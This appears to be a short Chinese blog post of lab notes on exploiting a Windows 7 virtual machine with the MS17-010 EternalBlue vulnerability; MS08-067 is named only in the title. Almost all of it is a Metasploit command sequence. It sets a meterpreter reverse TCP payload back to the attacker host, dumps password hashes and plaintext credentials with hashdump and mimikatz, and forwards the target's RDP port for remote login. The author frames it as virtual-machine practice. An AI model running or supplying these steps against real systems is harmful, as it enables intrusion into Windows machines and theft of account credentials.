iloveflag-blog

ms17_010和ms08-067实验笔记

字数统计: 229阅读时长: 1 min
2018/07/02 Share

win7靶机:192.168.1.38(所有实验均在虚拟机上完成,切勿用于非法用途)

kali:192.168.1.35

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/meterpreter/reverse_tcp

查看下options

返回shell后:

hashdump

load mimikatz

运行命令msv,导出hash

msv

然后执行kerberos即可获得目标机账号密码

kerberos

使用端口转发工具,将端口转发到访问者本地机器的某个端口,从而进行连接

运行命令

portfwd add -l 3389 -L 127.0.0.1 -p 3389 -r 172.16.215.229

此处,我们将远程目标的3389端口,转发到本机 的3389上

本地端口号可设置为其他未监听的端口

执行rdesktop 127.0.0.1 -u admin -p admin

可以进行上传和下载操作

遗留问题:

发现账户登录后靶机账户自动退出,看来需要新建一个用户,对方如果没有开3389咋办?

CATALOG
  1. 1. use exploit/windows/smb/ms17_010_eternalblue
  2. 2. 返回shell后:
  3. 3. 使用端口转发工具,将端口转发到访问者本地机器的某个端口,从而进行连接
  4. 4. 执行rdesktop 127.0.0.1 -u admin -p admin
  5. 5. 遗留问题: